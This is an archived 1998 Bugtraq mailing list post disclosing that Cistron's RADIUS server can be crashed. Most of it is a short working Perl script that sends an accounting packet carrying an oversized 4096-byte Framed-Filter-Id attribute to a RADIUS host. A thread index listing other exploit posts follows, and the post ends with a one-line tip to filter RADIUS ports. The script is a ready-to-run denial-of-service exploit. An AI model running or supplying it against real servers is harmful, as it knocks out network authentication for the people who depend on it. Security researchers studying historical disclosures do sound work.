Bugtraq mailing list archives
code to crash cistron's radius
From: hamdi.tounsi () ati tn (Hamdi Tounsi)
Date: Tue, 21 Apr 1998 09:59:08 -0100
--35904.37635.2092
Content-Type: text/plain
cistron's radius is also vulnerable to the radius crasher i posted here last
week, since it is derived from livingston's radius 1.16. the code is simpler :
#!/usr/bin/perl
use Authen::RadiusAcct;
$r = new Authen::RadiusAcct(Host => 'radiushost:1646', Secret => 'any_secret');
$r->load_dictionary;
$r->add_attributes(
{Name => 'User-Name', Value => 'dummy'},
{Name => 'Framed-Filter-Id',Type =>'string',Value =>pack('A4096','A')},
);
$r->send_packet(4);
}
* remember to filter access to your radius servers ports to protect them.
--35904.37635.2092--
Current thread:
- Re: APC UPS PowerChute PLUS exploit..., (continued)
- Re: APC UPS PowerChute PLUS exploit... Rick Perry (Apr 13)
- Re: APC UPS PowerChute PLUS exploit... Pascal Gienger (Apr 14)
- Re: APC UPS PowerChute PLUS exploit... Scott Stone (Apr 14)
- New possible exploit for 2.0.33 (kfree_skb error) Paul (Apr 15)
- Re: New possible exploit for 2.0.33 (kfree_skb error) Alan Cox (Apr 15)
- Linux 2.0.33 vulnerability: fragment patterns Alan Cox (Apr 16)
- Linux 2.0.33 vulnerability: oversized packets Michal Zalewski (Apr 17)
- Linux 2.0.34pre10: Summary of fixed vulnerabilities Alan Cox (Apr 20)
- Re: Linux 2.0.33 vulnerability: oversized packets Jon Lewis (Apr 20)
- Re: Linux 2.0.33 vulnerability: oversized packets Krzysztof G. Baranowski (Apr 21)
- code to crash cistron's radius Hamdi Tounsi (Apr 21)
- nestea v2. The program that DoS's 2.0.33s The Tree of Life (Apr 18)
- xdm problems Thomas Roessler (Apr 16)
- Re: xdm problems Matthieu Herrb (Apr 20)
- SECURITY: procps 1.2.7 fixes security hole Aleph One (Apr 20)
